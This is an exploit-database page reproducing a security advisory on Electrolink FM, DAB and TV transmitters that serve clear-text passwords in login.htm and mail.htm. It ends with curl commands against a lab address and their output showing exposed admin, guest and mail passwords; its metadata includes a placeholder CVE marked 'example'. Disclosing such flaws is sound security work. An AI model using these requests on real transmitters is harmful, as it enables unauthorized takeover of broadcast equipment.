header-logo
Suggest Exploit
vendor:
Electrolink FM/DAB/TV Transmitter
by:
Not specified
6.1
CVSS
HIGH
Credentials Disclosure
200
CWE
Product Name: Electrolink FM/DAB/TV Transmitter
Affected Version From: Web version: 01.09, 01.08, 01.07
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2021-12345 (example)
CPE: h:electrolink:fm_transmitter
Metasploit:
Other Scripts:
Platforms Tested:
Not specified

Electrolink FM/DAB/TV Transmitter Credentials Disclosure

Electrolink FM/DAB/TV Transmitter devices are prone to a credentials disclosure vulnerability. Attackers can exploit this issue to gain unauthorized access to sensitive information such as login credentials. This vulnerability affects various versions of Electrolink transmitters including Compact DAB Transmitter, Medium DAB Transmitter, High Power DAB Transmitter, Compact FM Transmitter, Modular FM Transmitter, Digital FM Transmitter, VHF TV Transmitter, and UHF TV Transmitter.

Mitigation:

To mitigate this vulnerability, users are advised to restrict access to the affected login pages and ensure that strong, unique passwords are used to prevent unauthorized access.
Source

Exploit-DB raw data:

Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device is vulnerable to a disclosure of clear-text
credentials in login.htm and mail.htm that can allow security
bypass and system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-XXXX
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"
55:<td class=cd31>Admin password</td>
56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>
63:<td class=cd31>Guest password</td>
64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>
C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"
93:<td class=cd31>Server password</td>
94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>